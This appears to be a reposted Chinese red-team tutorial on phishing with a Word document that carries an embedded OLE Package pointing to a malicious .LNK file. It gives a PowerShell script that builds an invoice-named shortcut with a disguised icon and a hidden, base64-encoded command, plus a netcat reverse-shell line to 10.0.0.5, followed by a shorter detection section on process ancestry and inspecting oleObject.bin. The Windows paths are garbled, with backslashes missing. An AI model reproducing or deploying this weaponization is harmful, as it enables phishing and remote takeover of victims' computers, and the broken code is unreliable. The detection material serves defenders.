武器化
创建 .LNK 文件,一旦执行将触发有效负载:
$command = 'Start-Process c:shell.cmd'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:experimentsole+lnkInvoice-FinTech-0900541.lnk")
$link.windowstyle = "7"
$link.targetpath = "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe"
$link.iconlocation = "C:Program FilesWindows NTAccessorieswordpad.exe"
$link.arguments = "-Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA=="
$link.save()
Powershell 有效负载将触发基本的 NC 反向 shell:
C:toolsnc.exe 10.0.0.5 443 -e cmd.exe
执行上述 powershell 脚本后,将创建一个快捷方式:.LNK
让我们创建一个 Word 文档,该文档将包含上一步中创建的恶意快捷方式:
让我们通过选择一个并将其图标源更改为 Microsoft Word 可执行文件来将一个新对象插入到文档中:Package
将包指向包含有效负载的.lnk文件:
最终效果
执行
执行嵌入文档的受害者。显示一个弹出窗口以确认执行
一旦受害者确认他们想要打开文件 - 反向shell就会返回给攻击者:
监测方法
触发有效负载后,进程祖先看起来符合预期 - powershell 由 winword 生成,cmd 由 powershell 生成..:
不久之后,powershell 被终止,cmd.exe成为一个孤立的进程:
与 T1137:网络钓鱼 - Office 宏中一样,您可以使用 Windows 工作站上的基本工具快速会审可疑的 Office 文档。首先,将文件重命名为 .zip 扩展名并解压缩。然后,您可以导航到并查找包含恶意的文件:wordembeddingsoleObject.bin.lnk
然后,您可以对文件进行简单或十六进制转储,您应该立即看到一些应该引起您注意的迹象:strings
hexdump.exe -C .oleObject1.bin
作为分析师,应该在.bin文件中查找,这意味着.doc包含嵌入的.lnk文件。在我们的例子中,可以在这里观察到这一点:CLSID 00021401-0000-0000-c000-000000000046
原文始发于微信公众号(白帽子社区团队):网络钓鱼:OLE+LNK(文末转发福利)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论